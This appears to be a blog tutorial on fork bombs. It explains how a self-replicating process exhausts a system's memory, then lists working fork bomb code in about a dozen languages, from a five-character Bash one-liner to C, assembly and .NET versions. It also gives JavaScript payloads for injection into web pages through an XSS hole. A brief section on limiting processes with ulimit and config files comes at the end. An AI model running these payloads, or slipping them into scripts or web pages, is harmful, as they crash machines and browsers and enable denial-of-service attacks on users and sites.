Think about, just 5 characters long virus equivalent of a Denial-Of-Service attack on any computer system. Which aims at depriving the system off its RAM, leaving none for vital functions required to keep the systems running, hence crashing it. Fork Bomb is not just deadly to a computer but it�s also annoying.
What Is Fork Bomb ??
Fork Bomb (aka Rabbit Virus or Wabbit) is a Denial-Of-Service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.
How About Virus Doubling Itself !!
Virus doubling itself is a form of exponential growth.
- After a single iteration of the loop, two viruses are created.
- After another cycle, each of those two creates another two for a total of four same virus.
- After 10 iterations we�ll have 2^10 = 1024 virus.
- After 100 iterations we have 2^100 = 1.267 Nonillion, that�s a number so big you don�t even know what �Nonillion� is (It�s 10^30).
Even with today�s CPUs and RAMs, being in the Tera Range (THz and Tb), the virus will probably not even complete 50 iterations before running out of memory. Remember, every iteration would hardly take a few milliseconds, so running this virus will almost definitely crash your computer.
Concept Behind Fork Bomb
Creation of a function that calls itself twice every call and doesn�t have any way to terminate itself. It will keep doubling up until you run out of system resources.
Coding Fork Bomb In Different Programming Languages
1# Fork Bomb using the Bash shell:
:(){ :|:& };:
Where,
:() means you are defining a function called :
{:|: &} means run the function : and send its output to the : function again and run that in the background.
The ; is a command separator, like &&.
: runs the function the first time.
2# Encoding in a standalone shell script as opposed to a shell function:
#!/bin/bash
./$0|./$0& #�$0? returns the name of the shell script itself
3# Fork Bomb using the Microsoft Windows batch language:
:s
start �� %0
goto s
The same as above, but shorter:
%0|%0
4# Fork Bomb using inline shell of Perl interpreter:
perl -e �fork while fork� &
5# Fork Bomb Using Python:
import os
while 1:
os.fork()
6# Fork Bomb Using Ruby:
loop { fork { load(__FILE__) } }
7# Fork Bomb using Haskell:
import Control.Monad (forever)
import System.Posix.Process (forkProcess)
forkBomb = forever $ forkProcess forkBomb
main = forkBomb
8# Fork Bomb using Common Lisp (Clozure CL):
(loop (#_fork))
9# Fork Bomb using C:
#include <unistd.h>
int main(void)
{
while(1) fork();
}
10# Fork Bomb using Assembly:
section .text
global_start
_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start
Fork Bomb In .NET using C#:
static void Main()
{
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}
11# Fork Bomb using VB.net:
Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True
12# Fork Bomb using JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:
<script>
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>
Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:
<a href=�#� onload=�function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }�>XSS fork bomb</a>
Or, a more aggressive version:
<script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>
Prevention
As a Fork Bomb�s mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own.
- On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit �u 30 would limit the affected user to a maximum of thirty owned processes.
- On PAM (Pluggable Authentication Module) enabled systems, this limit can also be set in /etc/security/limits.conf.
- On FreeBSD, the system administrator can put limits in /etc/login.conf.
Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.